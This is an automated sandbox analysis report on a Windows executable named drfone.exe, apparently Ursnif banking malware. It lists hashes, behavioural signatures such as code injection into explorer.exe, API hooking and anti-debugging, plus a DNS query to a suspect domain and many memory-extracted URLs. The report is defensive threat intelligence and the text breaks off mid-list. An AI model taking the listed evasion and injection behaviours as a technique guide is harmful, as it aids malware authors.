Analysis Report drfone.exe

Overview

General Information

Sample Name: drfone.exe
Analysis ID: 333865
MD5: 545f38fbb74881142712052a5b6eabce
SHA1: 4cbaf1ecb48629b163f4387605c8a9011e89183c
SHA256: 7b8ef3f064d0de0c27d56ff4df7d360f0d546d32aabbdf96a746bab5c84277ec
Tags: goziisfbOOONovasoftsignedursnif

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Compiles code for process injection (via .Net compiler)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a COM Internet Explorer object
Encrypted powershell cmdline option found
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Suspicious Csc.exe Source File Folder
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: drfone.exe ReversingLabs: Detection: 14%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.drfone.exe.610000.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.drfone.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: C:\Windows\explorer.exe Code function: 39_2_02DB2F10 FindFirstFileW,FindNextFileW,FindClose, 39_2_02DB2F10

Networking:

barindex
Creates a COM Internet Explorer object
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs Jump to behavior
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs Jump to behavior
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32 Jump to behavior
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32 Jump to behavior
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler Jump to behavior
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler Jump to behavior
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDSOLUTIONSRU CLOUDSOLUTIONSRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View JA3 fingerprint: 8916410db85077a5460817142dcbc8de
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x29f412c1,0x01d6da19</date><accdate>0x29f412c1,0x01d6da19</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x29f412c1,0x01d6da19</date><accdate>0x29f412c1,0x01d6da19</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2a2fad8a,0x01d6da19</date><accdate>0x2a2fad8a,0x01d6da19</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2a2fad8a,0x01d6da19</date><accdate>0x2a2fad8a,0x01d6da19</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2a320fdc,0x01d6da19</date><accdate>0x2a320fdc,0x01d6da19</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2a320fdc,0x01d6da19</date><accdate>0x2a320fdc,0x01d6da19</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: hapynewyear.xyz
Source: explorer.exe, 00000027.00000000.499661832.000000000E220000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: drfone.exe, 00000000.00000003.430319768.0000000003780000.00000004.00000040.sdmp String found in binary or memory: http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000027.00000000.499661832.000000000E220000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000027.00000002.726098923.000000000457B000.00000004.00000001.sdmp String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000027.00000002.726098923.000000000457B000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000020.00000002.519712045.00000276DDEDC000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000020.00000003.446799336.00000276DE0C9000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsoft
Source: drfone.exe String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: drfone.exe String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000020.00000002.517801949.00000276D5EE5000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000027.00000002.726098923.000000000457B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: drfone.exe String found in binary or memory: http://ocsp.sectigo.com0
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000020.00000002.509231908.00000276C608F000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000020.00000002.508230615.00000276C5E81000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
